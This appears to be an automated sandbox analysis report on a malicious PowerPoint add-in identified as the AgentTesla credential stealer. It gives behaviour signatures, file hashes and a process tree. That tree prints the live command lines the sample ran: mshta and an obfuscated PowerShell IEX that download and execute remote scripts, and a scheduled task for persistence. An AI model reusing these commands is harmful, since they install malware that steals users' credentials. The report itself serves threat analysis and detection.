Analysis
-
max time kernel
114s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
20-10-2021 06:38
General
-
Target
PO-20102021,pdf.ppam
-
Size
8KB
-
MD5
3471cb088d588150df6e37e2200afbf9
-
SHA1
90d89c9f5aaaae4c067f179651066303bc83f452
-
SHA256
66a3e3be3b63626de046621d447103e0978f5b24d3de0f412230ed6c2bfd6e28
-
SHA512
f01dc429d369a8502320775bf7b8fd7d56e8790ef2b91bfeea0b65fa5abf69f57a13f05493ccedb6606152682307f748b88879bc4afbe304c1e04a83cb017fb6
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
AgentTesla Payload 2 IoCs
-
Blocklisted process makes network request 10 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 35 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-20102021,pdf.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://www.bitly.com/wdowdpowdrufhjwijjd2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/6.html\""3⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 29643⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_67566eeb47104ffcb45eb2d55a0630a7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_80df20c857fc425bb4e96cfc21421a37.txt').GetResponse().GetResponseStream()).ReadToend());3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES340C.tmp" "c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\CSCB5F0EA64DCDA48CBB28B3F9AB6B0C8A9.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Drops file in Drivers directory
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES340C.tmpMD5
2caf3100fd09a5136a659a92ea1ffd47
SHA1de3a30532b02a678fd955983450115f8d2f85d84
SHA2567fd8935962e1beba6dd81fe4cc7fbf8cded1ebd8335f52677554bd8a47d0db03
SHA5126af2ad9a32222925665ffef58c161b48ccec9c6cde0bcb33c02fa6e908222d21bf84e7efd21876ddc5d5f87c6ddb4c5359faf353ff2ecedf58f7be24a3a01e6f
-
C:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.dllMD5
fab23d12ab053e47245a70d4797d8be6
SHA15625f44448ed855064ed6095ea6b1e2e415416c7
SHA25658c6d8e784368a18261952c7ee3688f1587b6fe260e059ea9c6871076f630374
SHA5126b3fa660dc98762185e64b43e3c771bf389e9ce0385d8d5fc5bcc43d55cf44525f7879cc9ed282c1dc37854ce700f98bd776e32455f8ac917c8ab756ce8240ea
-
C:\Windows\system32\drivers\etc\hostsMD5
5b2d17233558878a82ee464d04f58b59
SHA147ebffcad0b4c358df0d6a06ef335cb6aab0ab20
SHA2565b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542
SHA512d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b
-
\??\c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\CSCB5F0EA64DCDA48CBB28B3F9AB6B0C8A9.TMPMD5
39cfc0f99a9eb0ea5fca96ec5c828c4f
SHA1cce25468e348d6fd9691bed7d226cd3026eab587
SHA256db8aabeea3d53b2b368bb15bfa20babd64c6ec29f2f341a91beda2272837d71a
SHA5124c8e0711fb8b78c4b31778cfe98ab2073cdf35aabce2abc1a1b25f7ac4da072dc24e79ddab5b97d9ff3fbc86ca4b444d750e3880d8d758cff2c124363a3c6462
-
\??\c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.0.csMD5
e03b1e7ba7f1a53a7e10c0fd9049f437
SHA13bb851a42717eeb588eb7deadfcd04c571c15f41
SHA2563ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
SHA512a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
-
\??\c:\Users\Admin\AppData\Local\Temp\n3y0mgtx\n3y0mgtx.cmdlineMD5
a1ee74197f66fb8b0bf19b6ce9e70e15
SHA1e856627f45317f8e7019dded90612ed9c1d76226
SHA2564f45ba3433e7d2a5df795781f7ae0529515a7d3b93a6d9adbf3737d8d1fbe376
SHA5127db16ff7f47dea65ab185df4a1044e869f7176f793e7a23ef862f57daf6fbb24b2a1661209b6016848d1fbebf13917c23fba4cad02f3588fdd09447bad81894e
-
memory/316-295-0x0000000000000000-mapping.dmp
-
memory/740-292-0x0000000000000000-mapping.dmp
-
memory/888-309-0x000001D7A1D53000-0x000001D7A1D55000-memory.dmpFilesize
8KB
-
memory/888-294-0x0000000000000000-mapping.dmp
-
memory/888-308-0x000001D7A1D50000-0x000001D7A1D52000-memory.dmpFilesize
8KB
-
memory/888-310-0x000001D7A1D56000-0x000001D7A1D58000-memory.dmpFilesize
8KB
-
memory/1140-291-0x0000000000000000-mapping.dmp
-
memory/1432-293-0x0000000000000000-mapping.dmp
-
memory/1472-408-0x00000000052C1000-0x00000000052C2000-memory.dmpFilesize
4KB
-
memory/1472-397-0x00000000052C0000-0x00000000052C1000-memory.dmpFilesize
4KB
-
memory/1472-391-0x00000000004376CE-mapping.dmp
-
memory/2460-385-0x0000000000000000-mapping.dmp
-
memory/2596-261-0x0000000000000000-mapping.dmp
-
memory/2780-382-0x0000000000000000-mapping.dmp
-
memory/2900-381-0x00000000055D0000-0x0000000005ACE000-memory.dmpFilesize
5.0MB
-
memory/2900-324-0x00000000004376CE-mapping.dmp
-
memory/2900-407-0x00000000055D0000-0x0000000005ACE000-memory.dmpFilesize
5.0MB
-
memory/3144-121-0x000001AD1A100000-0x000001AD1A102000-memory.dmpFilesize
8KB
-
memory/3144-120-0x000001AD1A100000-0x000001AD1A102000-memory.dmpFilesize
8KB
-
memory/3144-119-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmpFilesize
64KB
-
memory/3144-118-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmpFilesize
64KB
-
memory/3144-117-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmpFilesize
64KB
-
memory/3144-115-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmpFilesize
64KB
-
memory/3144-122-0x000001AD1A100000-0x000001AD1A102000-memory.dmpFilesize
8KB
-
memory/3144-116-0x00007FFE82E80000-0x00007FFE82E90000-memory.dmpFilesize
64KB
-
memory/3144-250-0x000001AD293F0000-0x000001AD293F4000-memory.dmpFilesize
16KB